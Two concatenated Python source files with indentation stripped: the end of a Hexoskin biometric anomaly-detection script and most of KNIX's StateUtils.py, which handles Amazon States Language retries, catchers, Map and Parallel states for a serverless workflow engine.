th6 = Thread(target=respObj.delete_DS, args=[])
th6.start()
def sleep_AD(self):
"""
this is only for testing and reference purpose,
in actuality, create SleepAD object and call
directly - no need to create AD object for this
Input:
None
Output:
stores to the anomaly_dict of the SleepAD class
Notes:
based on:
'https://www.sleepcycle.com/how-it-works/'
'http://blog.doctoroz.com/oz-experts/calculating-your-
perfect-bedtime-and-sleep-efficiency'
'https://api.hexoskin.com/docs/resource/sleepphase/'
            'https://api.hexoskin.com/docs/resource/sleepposition/'
'https://api.hexoskin.com/docs/resource/metric/'
Refer to readme for more details
"""
SleepObj = SleepAD()
SleepObj.populate_DS()
SleepObj.get_metrics()
SleepObj.calc_woke_up_count()
SleepObj.get_possible_anomaly()
def main():
AD = AnomalyDetector()
rr_intervals = (pd.read_csv('rrinterval.txt',
sep="\t",
nrows=AD.config.getint('Atrial Fibrillation',
'window_size'),
dtype={"hexoskin_timestamps": np.int64,
"rr_int": np.float64},
header=None,
names=["hexoskin_timestamps", "rr_int"]))
hr_quality_indices = (pd.read_csv('hr_quality.txt',
sep="\t",
nrows=AD.config.
getint('Atrial Fibrillation',
'window_size')-8,
dtype={"hexoskin_timestamps": np.int64,
"quality_ind": np.int32},
header=None,
names=["hexoskin_timestamps",
"quality_ind"]))
# call the Atrial Fibrillation anomaly detection method
logging.info("%s" %
str(AD.af_anomaly_detect(rr_intervals, hr_quality_indices)))
ecg = (pd.read_csv('ecg.txt',
sep="\t",
nrows=256*6,
dtype={"hexoskin_timestamps": np.int64,
"ecg_val": np.int32},
header=None,
names=["hexoskin_timestamps", "ecg_val"]))
"""
for testing, ensure that only the relevant timestamped
rr_intervals are present in rrinterval.txt as it reads
a preset 7 rows
"""
rr_intervals = (pd.read_csv('rrinterval.txt',
sep="\t",
nrows=7,
dtype={"hexoskin_timestamps": np.int64,
"rr_int": np.float64},
header=None,
names=["hexoskin_timestamps", "rr_int"]))
"""
for testing, ensure that only the relevant timestamped
rr_status are present in rr_interval_status.txt as it
reads a preset 7 rows
"""
rr_interval_status = (pd.read_csv('rr_interval_status.txt',
sep="\t",
nrows=7,
dtype={"hexoskin_timestamps": np.int64,
"rr_status": np.int32},
header=None,
names=["hexoskin_timestamps",
"rr_status"]))
# call the Ventricular Tachycardia anomaly detection method
AD.vt_anomaly_detect(ecg, rr_intervals, rr_interval_status, 1400)
AD.apc_pvc(383021266184)
AD.pvc_Hamilton(383021266184)
AD.resp_AD(383021140185)
AD.sleep_AD()
if __name__ == '__main__':
main()
|
StateUtils.py
|
# Copyright 2020 The KNIX Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import copy
from datetime import datetime
import json
import socket
import time
import threading
import anytree
from thriftpy2.transport import TFramedTransportFactory, TServerSocket
from thriftpy2.protocol import TCompactProtocolFactory
from thriftpy2.server import TSimpleServer
from thriftpy2.thrift import TProcessor
from ujsonpath import parse, tokenize
import py3utils
from DataLayerClient import DataLayerClient
class StateUtils:
defaultStateType = 'Task_SAND'
taskStateType = 'Task'
choiceStateType = 'Choice'
passStateType = 'Pass'
succeedStateType = 'Succeed'
failStateType = 'Fail'
waitStateType = 'Wait'
parallelStateType = 'Parallel'
mapStateType = 'Map'
mapFunctionOutput = {}
def __init__(self, functionstatetype=defaultStateType, functionstatename='', functionstateinfo='{}', functionruntime="", logger=None, workflowid=None, sandboxid=None, functiontopic=None, datalayer=None, storage_userid=None, internal_endpoint=None):
self.operators = ['And', 'BooleanEquals', 'Not', 'NumericEquals', 'NumericGreaterThan', 'NumericGreaterThanEquals',\
'NumericLessThan', 'NumericLessThanEquals', 'Or', 'StringEquals', 'StringGreaterThan',\
'StringGreaterThanEquals', 'StringLessThan', 'StringLessThanEquals', 'TimestampEquals', 'TimestampGreaterThan',\
'TimestampGreaterThanEquals', 'TimestampLessThan', 'TimestampLessThanEquals']
self.operators_python = ['and', '==', 'not', '==', '>', '>=', '<', '<=', 'or', '==', '>', '>=', '<', '<=', '==', '>', '>=', '<', '<=']
self.operators_set = set(self.operators)
self.asl_errors = ("States.ALL", "States.Timeout", "States.TaskFailed", "States.Permissions", "States.ResultPathMatchFailure", "States.BranchFailed", "States.NoChoiceMatched")
self.nodelist = []
self.parsed_trees = []
self.default_next_choice = []
self.input_path_dict = {}
self.items_path_dict = {}
self.result_path_dict = {}
self.output_path_dict = {}
self.parameters_dict = {}
self.functionstatetype = functionstatetype
self.functionstatename = functionstatename
self.functionstateinfo = functionstateinfo
self.functiontopic = functiontopic
self._datalayer = datalayer
self._storage_userid = storage_userid
self._internal_endpoint = internal_endpoint
self._function_runtime = functionruntime
if self._function_runtime == "java":
# if java, this is the address we'll send requests to be handled
self._java_handler_address = "/tmp/java_handler_" + self.functionstatename + ".uds"
self.parsedfunctionstateinfo = {}
self.workflowid = workflowid
self.sandboxid = sandboxid
self.choiceNext = ''
self.mapStateCounter = 0
self.evaluateCounter = 0
self.catcher_list = []
self.retry_list = []
self._logger = logger
self.parse_function_state_info()
self.function_output_batch_list = []
self.tobeProcessedlater = []
self.outputMapStatebatch = []
self.mapPartialResult = {}
def call_counter(func):
def helper(*args, **kwargs):
helper.calls += 1
return func(*args, **kwargs)
helper.calls = 0
helper.__name__ = func.__name__
return helper
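# Usage sketch for call_counter (hypothetical, not wired up elsewhere in this
# class): decorating a function exposes an invocation count afterwards, e.g.
#   @call_counter
#   def probe(x): return x
#   probe(1); probe(2)
#   probe.calls  # -> 2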
# find target next for error in catcher list
def find_cat_data(self, err, cat_list):
cat_result = "$" # default
cat_next = [] # default
for cat in cat_list:
if "ErrorEquals" in cat and (str(err) in cat["ErrorEquals"] or err.__class__.__name__ in cat["ErrorEquals"]):
cat_next = cat['Next']
if "ResultPath" in cat:
cat_result = cat['ResultPath']
return cat_next, cat_result
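# Illustrative Catch entry as it would appear in an ASL state definition
# (hypothetical values):
#   {"ErrorEquals": ["States.TaskFailed"], "Next": "RecoveryState", "ResultPath": "$.error-info"}
# For an error matching ErrorEquals, find_cat_data returns
# ("RecoveryState", "$.error-info"); unmatched errors yield ([], "$").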
def find_ret_data(self, err, ret_list):
ret_max_attempts = 1 # default
ret_interval_seconds = 1 # default
ret_backoff_rate = 1.0 # default
for ret in ret_list:
if err in ret['ErrorEquals'] or err.__class__.__name__ in ret['ErrorEquals']:
if "MaxAttempts" in list(ret.keys()):
ret_max_attempts = ret['MaxAttempts']
if "IntervalSeconds" in list(ret.keys()):
ret_interval_seconds = ret['IntervalSeconds']
if "BackoffRate" in list(ret.keys()):
ret_backoff_rate = ret['BackoffRate']
return ret_max_attempts, ret_interval_seconds, ret_backoff_rate
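# Illustrative Retry entry (hypothetical values):
#   {"ErrorEquals": ["States.Timeout"], "MaxAttempts": 3, "IntervalSeconds": 2, "BackoffRate": 1.5}
# For a matching error, find_ret_data returns (3, 2, 1.5); unmatched errors
# fall back to the defaults (1, 1, 1.0).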
def isMapState(self):
return self.functionstatetype == StateUtils.mapStateType
def isTaskState(self):
return self.functionstatetype == StateUtils.taskStateType or self.functionstatetype == StateUtils.defaultStateType
def applyParameters(self, raw_state_input):
#2c. Apply Parameters, if available and applicable (The Parameters field is used in Map to select values in the input)
# in = raw_state_input
# if Parameters:
#     in = values of raw_state_input selected/transformed according to Parameters
#
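# Example (hypothetical Map-state input): with
#   Parameters = {"value.$": "$$.Map.Item.Value", "index.$": "$$.Map.Item.Index"}
# and raw_state_input = {"items": ["a", "b"]}, process_parameters expands the
# input to {"items": [{"value": "a", "index": 0}, {"value": "b", "index": 1}]}.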
try:
function_input = raw_state_input
self._logger.debug("inside applyParameters: " + str(self.parameters_dict) + ", raw_state_input: " + str(raw_state_input))
if self.parameters_dict:
function_input = self.process_parameters(self.parameters_dict, function_input)
return function_input
except Exception:
raise Exception("Parameters processing exception")
def applyItemsPath(self, raw_state_input):
#2a. Apply ItemsPath, if available and applicable (The ItemsPath field is used in Map to select an array in the input)
# in = raw_state_input
# if ItemsPath:
# in = raw_state_input[ItemsPath]
#
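# Example (hypothetical): with ItemsPath = "$.items" and
# raw_state_input = {"items": [1, 2, 3], "meta": "x"}, the Map state iterates
# over [1, 2, 3].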
try:
function_input = raw_state_input
if self.items_path_dict and 'ItemsPath' in self.items_path_dict:
function_input = self.process_items_path(self.items_path_dict, function_input)
return function_input
except Exception:
raise Exception("Items path processing exception")
def applyInputPath(self, raw_state_input):
#2. Apply InputPath, if available (Extract function_input from raw_state_input)
# in = raw_state_input
# if InputPath:
# in = raw_state_input[InputPath]
#
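# Example (hypothetical): with InputPath = "$.payload" and
# raw_state_input = {"payload": {"x": 1}, "trace": "t"}, the function input
# becomes {"x": 1}; an InputPath of null yields an empty dict.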
try:
function_input = raw_state_input
if self.input_path_dict and 'InputPath' in self.input_path_dict:
function_input = self.process_input_path(self.input_path_dict, function_input)
return function_input
except Exception:
raise Exception("Input path processing exception")
# send a request to the java worker and get the result
def _send_java_request(self, java_input, java_output, api_server, server_socket):
# get a connection to the java worker
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# send the request
max_num_tries = 10
num_tries = 0
trying = True
has_error = False
while trying:
try:
sock.connect(self._java_handler_address)
trying = False
except socket.error as msg:
num_tries += 1
if num_tries > max_num_tries:
self._logger.debug("cannot open connection to java worker: %s", msg)
trying = False
has_error = True
else:
self._logger.debug("will retry connection to java worker...")
time.sleep(0.05*num_tries)
if not has_error:
try:
sock.sendall(java_input.encode())
sock.shutdown(socket.SHUT_WR)
# receive the response
chunks = []
while True:
data = sock.recv(4096)
if not data:
sock.close()
break
chunks.append(data.decode())
output_data = "".join(chunks)
self._logger.debug("received output_data: " + output_data)
try:
output_data = json.loads(output_data)
if not output_data["hasError"]:
java_output["functionResult"] = output_data["functionResult"]
java_output["hasError"] = False
java_output["errorType"] = ""
java_output["errorTrace"] = ""
else:
java_output["hasError"] = output_data["hasError"]
java_output["errorType"] = output_data["errorType"]
java_output["errorTrace"] = output_data["errorTrace"]
except Exception as exc:
self._logger.debug("Problem in received output_data: " + output_data)
pass
# close the api server in the main thread, so that we can continue with publishing the output
api_server.close()
server_socket.close()
except socket.error as msg:
self._logger.debug("cannot send request to java worker: %s", msg)
#os._exit(1)
def _exec_function(self, runtime, exec_arguments, sapi):
if runtime == "python 3.6":
func = exec_arguments["function"]
args = exec_arguments["function_input"]
function_output = func(args, sapi)
elif runtime == "java":
# open the API server for this request
api_uds = exec_arguments["api_uds"]
thriftAPIService = exec_arguments["thriftAPIService"]
java_input = exec_arguments["function_input"]
processor = TProcessor(thriftAPIService, sapi)
server_socket = TServerSocket(unix_socket=api_uds, client_timeout=None)
# no need for any other type of server; there will only be a single client: the java function instance
api_server = TSimpleServer(processor, server_socket,
iprot_factory=TCompactProtocolFactory(),
itrans_factory=TFramedTransportFactory())
self._logger.debug("API server at: " + api_uds)
self._logger.debug("starting with java_input: " + java_input)
# access to the output for the thread via an object
java_output = {}
# send it to the java worker in a thread
# (thread has access to api_server object and server_socket to stop it)
# (thread has also access to the output to set it in the main thread of execution)
try:
t = threading.Thread(target=self._send_java_request, args=(java_input, java_output, api_server, server_socket,))
t.start()
except Exception as exc:
pass
# meanwhile, the main thread listens and serves API requests
# when the execution is finished, the api server will be stopped
try:
self._logger.debug("API server serving...")
api_server.serve()
except Exception as exc:
#raise exc
pass
# when the java worker function returns, it stops the API server and sets the output that was produced
# get the output
has_error = java_output["hasError"]
error_type = java_output["errorType"]
error_trace = java_output["errorTrace"]
if not has_error:
function_output = java_output["functionResult"]
else:
# _XXX_: need to raise the exception, so that the catcher and retryer can have a chance
raise Exception(error_type)
return function_output
#@retry(ZeroDivisionError, tries=10, delay=1) # ToDo: parse parameters of retryers and catchers
#@retry([x[0] for x in self.asl_errors], tries=3, delay=2) # ToDo: parse parameters of retryers and catchers
#@retry("States.ALL", tries=3, delay=2)
def exec_function_catch_retry(self, runtime, exec_arguments, sapi):
retryer = self.retry_list
catcher = self.catcher_list
ret_error_list = []
ret_interval_seconds = 0
ret_backoff_rate = 0
ret_max_attempts = 0
cat_next = ""
ret_value = []
for ret in retryer:
ret_error_list = ret['ErrorEquals']
self._logger.debug("[StateUtils] found a ASL workflow retryer, retry for: " + str(ret_error_list))
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
self._logger.debug("[StateUtils] retryer just caught an error: " + ", " + str(exc) + ", " + str(exc.__class__.__name__) + ", " + str(retryer))
ret_max_attempts, ret_interval_seconds, ret_backoff_rate = self.find_ret_data(exc, retryer) # get the retry data for this error
delay = int(ret_interval_seconds)
max_attempts = int(ret_max_attempts)
backoff_rate = float(ret_backoff_rate)
# start retrying on this error
while max_attempts:
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as e_retry:
if (any(str(e_retry) in s0 for s0 in ret_error_list) or any(e_retry.__class__.__name__ in s1 for s1 in ret_error_list)):
self._logger.debug("[StateUtils] MFn ASL retryer just caught an error:" + str(e_retry) + str(retryer))
self._logger.debug("[StateUtils] retrying for Error: " + str(e_retry) + ", remaining attempts: " + str(max_attempts))
max_attempts -= 1
if not max_attempts:
ret_value = {"Error": str(exc), "Cause": "Error not caught by MFn ASL Workflow retryer"}
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow retryer!")
return ret_value
#raise # max retries have been reached
self._logger.warning('%s, retrying in %s seconds... ' % (e_retry, str(delay)))
time.sleep(delay)
delay *= backoff_rate
if catcher:
self._logger.debug("[StateUtils] found a ASL workflow catcher")
# there was no retry information provided for this function, proceed with catch
ret_value = {"Error": "Catcher", "Cause": "error caught by MFn ASL Workflow catcher"}
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
exc_msg = str(exc)
self._logger.error("[StateUtils] catcher just caught an error: " + exc_msg + " " + str(catcher))
cat_next, cat_result = self.find_cat_data(exc, catcher)
if cat_next != []:
self._logger.error("[StateUtils] matching catch list entry target and result for this error: " + str(cat_next) + " " + str(cat_result))
self.result_path_dict['ResultPath'] = cat_result
ret_value = {"Error": exc_msg, "Cause": "this error caught by MFn ASL Workflow catcher!"}
if runtime == "java":
# do an extra serialization, because we were expecting a java output,
# but got a python object
val = {}
val["value"] = exc_msg
exc_msg = json.dumps(val)
sapi.add_dynamic_next(cat_next, exc_msg)
return ret_value
else: # no catcher could be found for this error
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow catcher!")
raise exc
else: # neither catcher nor retryers are set
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
def getChoiceResults(self, value_output):
choice_next_list = []
#self._logger.debug("[StateUtils] getChoiceResults Inputs: " + str(self.choiceNext) + str(self.functionstatetype))
if self.functionstatetype == self.choiceStateType and self.choiceNext != '':
choice_next_list.append({"next": self.choiceNext, "value": value_output})
return choice_next_list
def evaluateChoiceConditions(self, function_input):
self.choiceNext = ''
self.choiceNext = self.evaluateNextState(function_input)
self._logger.debug("[StateUtils] Evaluated Choice condition: " + str(self.choiceNext))
def evaluateMapState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
if "MaxConcurrency" in self.parsedfunctionstateinfo:
maxConcurrency = self.parsedfunctionstateinfo["MaxConcurrency"]
else:
maxConcurrency = 0
self.parsedfunctionstateinfo["MaxConcurrency"] = maxConcurrency
if "Parameters" in self.parsedfunctionstateinfo:
mapParameters = self.parsedfunctionstateinfo["Parameters"]
else:
mapParameters = {}
self._logger.debug("[StateUtils] evaluateMapState, maxConcurrency: " + str(maxConcurrency))
self._logger.debug("[StateUtils] evaluateMapState metadata: " + str(metadata))
counter_name_topic = self.functionstatename + "-" + self.sandboxid
total_branch_count = len(function_input) # all branches executed concurrently
klist = [total_branch_count]
self.parsedfunctionstateinfo["BranchCount"] = int(total_branch_count) # overwrite parsed BranchCount with new value
self._logger.debug("[StateUtils] evaluateMapState, total_branch_count: " + str(total_branch_count))
# prepare counter metadata
counter_metadata = {}
counter_metadata["__state_action"] = "post_map_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
iterator = self.parsedfunctionstateinfo["Iterator"]
counter_name_trigger_metadata = {"k-list": klist, "total-branches": total_branch_count}
# dynamic values used for generation of branches
counter_name_key = key
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = key + "-branch-" + str(i+1)
branch_out_keys.append(branch_out_key)
# prepare counter name value metadata
counter_name_value_metadata = copy.deepcopy(metadata)
counter_name_value_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_name_value_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_name_value_metadata["__state_action"] = "post_map_processing"
counter_name_value_metadata["state_counter"] = metadata["state_counter"]
self._logger.debug("[StateUtils] evaluateMapState, metadata[state_counter]: " + str(metadata["state_counter"]))
self.mapStateCounter = int(metadata["state_counter"])
counter_name_value = {"__mfnmetadata": counter_name_value_metadata, "__mfnuserdata": '{}'}
#CounterName = json.dumps([str(counter_name_topic), str(counter_name_key), counter_name_trigger_metadata, counter_name_value])
CounterName = str(counter_name_topic) + "-" + str(total_branch_count) + "-" + str(counter_name_key)
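# Sketch of the resulting counter name (hypothetical values): for state name
# "MyMap", sandbox "sb1", 3 branches and execution key "k42" this yields
# "MyMap-sb1-3-k42".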
# prepare mapInfo metadata
workflow_instance_outputkeys_set_key = key +"_"+ self.functionstatename + "_outputkeys_set"
mapInfo = {}
mapInfo["CounterTopicName"] = counter_name_topic
mapInfo["CounterNameKey"] = counter_name_key
mapInfo["TriggerMetadata"] = counter_name_trigger_metadata
mapInfo["CounterNameValueMetadata"] = counter_name_value_metadata
mapInfo["BranchOutputKeys"] = branch_out_keys
mapInfo["CounterName"] = CounterName
mapInfo["MaxConcurrency"] = maxConcurrency
mapInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
mapInfo["Klist"] = klist
mapInfo_key = self.functionstatename + "_" + key + "_map_info"
metadata[mapInfo_key] = mapInfo
# create counter for Map equivalent Parallel state
assert py3utils.is_string(CounterName)
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded put key: " + str(workflow_instance_metadata_storage_key))
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
# Now provide each branch with its own input
branch = self.parsedfunctionstateinfo["Iterator"] # this is just onee set
# launch a branch for each input element
startat = str(branch["StartAt"])
for i in range(len(function_input)):
sapi.add_dynamic_next(startat, function_input[i]) # Alias for add_workflow_next(self, next, value)
sapi.put(name_prefix + "_" + "mapStateInputValue", str(function_input[i]))
sapi.put(name_prefix + "_" + "mapStateInputIndex", str(i))
self._logger.debug("\t Map State StartAt:" + startat)
self._logger.debug("\t Map State input:" + str(function_input[i]))
return function_input, metadata
def evaluatePostMap(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
# function is triggered by post-commit hook with metadata containing information about state results in buckets.
# It collects these results and returns metadata and post_map_output_results
action = metadata["__state_action"]
assert action == "post_map_processing"
counterValue = function_input["CounterValue"]
state_counter = 0
if "state_counter" in metadata:
state_counter = metadata["state_counter"]
self._logger.debug("\t metadata:" + json.dumps(metadata))
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded get: " + str(full_metadata_encoded))
full_metadata = json.loads(full_metadata_encoded)
full_metadata["state_counter"] = state_counter
mapInfoKey = self.functionstatename + "_" + key + "_map_info"
mapInfo = full_metadata[mapInfoKey]
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
self._logger.debug("\t branchOutputKeysSet: " + str(branchOutputKeysSet))
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
klist = mapInfo["Klist"]
#self._logger.debug("\t action: " + action)
#self._logger.debug("\t counterValue:" + str(counterValue))
#self._logger.debug("\t WorkflowInstanceMetadataStorageKey:" + metadata["WorkflowInstanceMetadataStorageKey"])
#self._logger.debug("\t full_metadata:" + full_metadata_encoded)
#self._logger.debug("\t mapInfoKey: " + mapInfoKey)
#self._logger.debug("\t mapInfo:" + json.dumps(mapInfo))
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
#self._logger.debug("\t branchOutputKeysSet:" + str(branchOutputKeysSet))
#self._logger.debug("\t klist:" + str(klist))
NumBranchesFinished = abs(counterValue)
self._logger.debug("\t NumBranchesFinished:" + str(NumBranchesFinished))
do_cleanup = False
if klist[-1] == NumBranchesFinished:
do_cleanup = True
self._logger.debug("\t do_cleanup:" + str(do_cleanup))
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
assert py3utils.is_string(counterName)
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
post_map_output_values = []
self._logger.debug("\t mapInfo_BranchOutputKeys:" + str(mapInfo["BranchOutputKeys"]))
self._logger.debug("\t mapInfo_BranchOutputKeys length: " + str(len(mapInfo["BranchOutputKeys"])))
for outputkey in mapInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet: # mapInfo["BranchOutputKeys"]:
self._logger.debug("\t BranchOutputKey:" + outputkey)
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
self._logger.debug("\t branchOutput(type):" + str(type(branchOutput)))
self._logger.debug("\t branchOutput:" + branchOutput)
self._logger.debug("\t branchOutput_decoded(type):" + str(type(branchOutput_decoded)))
self._logger.debug("\t branchOutput_decoded:" + str(branchOutput_decoded))
post_map_output_values = post_map_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
self._logger.debug("\t cleaned output key:" + outputkey)
else:
post_map_output_values = post_map_output_values + [None]
self._logger.debug("\t this_BranchOutputKeys is not contained: " + str(outputkey))
self._logger.debug("\t post_map_output_values:" + str(post_map_output_values))
while (sapi.get(name_prefix + "_" + "mapStatePartialResult")) == "":
time.sleep(0.1) # wait until value is available
mapStatePartialResult = ast.literal_eval(sapi.get(name_prefix + "_" + "mapStatePartialResult"))
mapStatePartialResult += post_map_output_values
sapi.put(name_prefix + "_" + "mapStatePartialResult", str(mapStatePartialResult))
# now apply ResultPath and OutputPath
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if ast.literal_eval(sapi.get(name_prefix + "_" + "mapInputCount")) == len(mapStatePartialResult):
# we are ready to publish but need to honour ResultPath and OutputPath
res_raw = ast.literal_eval(sapi.get(name_prefix + "_" +"mapStatePartialResult"))
# remove unwanted keys from input before publishing
function_input = {}
function_input_post_result = self.applyResultPath(function_input, res_raw)
function_input_post_output = self.applyOutputPath(function_input_post_result)
if "Next" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["Next"]:
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], function_input_post_output )
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
sapi.add_dynamic_next("end", function_input_post_output)
sapi.delete(name_prefix + "_" + "mapInputCount")
sapi.delete(name_prefix + "_" + "mapStateInputIndex")
sapi.delete(name_prefix + "_" + "mapStateInputValue")
sapi.delete(name_prefix + "_" + "mapStatePartialResult")
sapi.delete(name_prefix + "_" + "tobeProcessedlater")
post_map_output_values = function_input_post_output
return post_map_output_values, full_metadata
def evaluateParallelState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
total_branch_count = self.parsedfunctionstateinfo["BranchCount"]
assert total_branch_count == len(self.parsedfunctionstateinfo["Branches"])
klist = []
if "WaitForNumBranches" in self.parsedfunctionstateinfo:
klist = self.parsedfunctionstateinfo["WaitForNumBranches"]
if not isinstance(klist, list):
self._logger.info("(StateUtils) WaitForNumBranches must be a sorted list with 1 or more integers")
raise Exception("(StateUtils) WaitForNumBranches must be a sorted list with 1 or more integers")
klist.sort()
for k in klist:
if not isinstance(k, int):
self._logger.info("(StateUtils) Values inside WaitForNumBranches must be integers")
raise Exception("(StateUtils) Values inside WaitForNumBranches must be integers")
if k > total_branch_count:
self._logger.info("(StateUtils) Values inside WaitForNumBranches list cannot be greater than the number of branches in the parallel state")
raise Exception("(StateUtils) Values inside WaitForNumBranches list cannot be greater than the number of branches in the parallel state")
else:
klist.append(total_branch_count)
counter_name_topic = self.functionstatename + "-" + self.sandboxid
counter_name_trigger_metadata = {"k-list": klist, "total-branches": total_branch_count}
counter_name_key = key
# dynamic values
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = name_prefix + "_branch_" + str(i+1)
branch_out_keys.append(branch_out_key)
# prepare counter metadata
counter_metadata = {}
counter_metadata["__state_action"] = "post_parallel_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
# prepare counter name value metadata
counter_name_value_metadata = copy.deepcopy(metadata)
counter_name_value_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_name_value_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_name_value_metadata["__state_action"] = "post_parallel_processing"
counter_name_value_metadata["state_counter"] = metadata["state_counter"]
counter_name_value = {"__mfnmetadata": counter_name_value_metadata, "__mfnuserdata": '{}'}
#CounterName = json.dumps([str(counter_name_topic), str(counter_name_key), counter_name_trigger_metadata, counter_name_value])
CounterName = str(counter_name_topic) + "-" + str(total_branch_count) + "-" + str(counter_name_key)
#CounterName = name_prefix + "_counter"
counter_metadata_key_name = CounterName + "_metadata"
workflow_instance_outputkeys_set_key = name_prefix + "_outputkeys_set"
# prepare parallelInfo metadata
parallelInfo = {}
parallelInfo["CounterName"] = CounterName
parallelInfo["BranchOutputKeys"] = branch_out_keys
parallelInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
parallelInfo["Klist"] = klist
parallelInfo["TotalBranches"] = total_branch_count
parallelInfo["ExecutionId"] = key
parallelInfo["FunctionTopic"] = self.functiontopic
parallelInfo["Endpoint"] = self._internal_endpoint
parallelInfo_key = self.functionstatename + "_" + key + "_parallel_info"
metadata[parallelInfo_key] = parallelInfo
assert py3utils.is_string(CounterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
branches = self.parsedfunctionstateinfo["Branches"]
for branch in branches:
startat = str(branch["StartAt"])
sapi.add_dynamic_next(startat, function_input)
return function_input, metadata
def processBranchTerminalState(self, key, value_output, metadata, sapi):
if 'End' not in self.parsedfunctionstateinfo:
return
if self.parsedfunctionstateinfo["End"] and "ParentParallelInfo" in self.parsedfunctionstateinfo:
parentParallelInfo = self.parsedfunctionstateinfo["ParentParallelInfo"]
parallelName = parentParallelInfo["Name"]
branchCounter = parentParallelInfo["BranchCounter"]
#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentParallelInfo:" + json.dumps(parentParallelInfo))
#self._logger.debug("\t parallelName:" + parallelName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
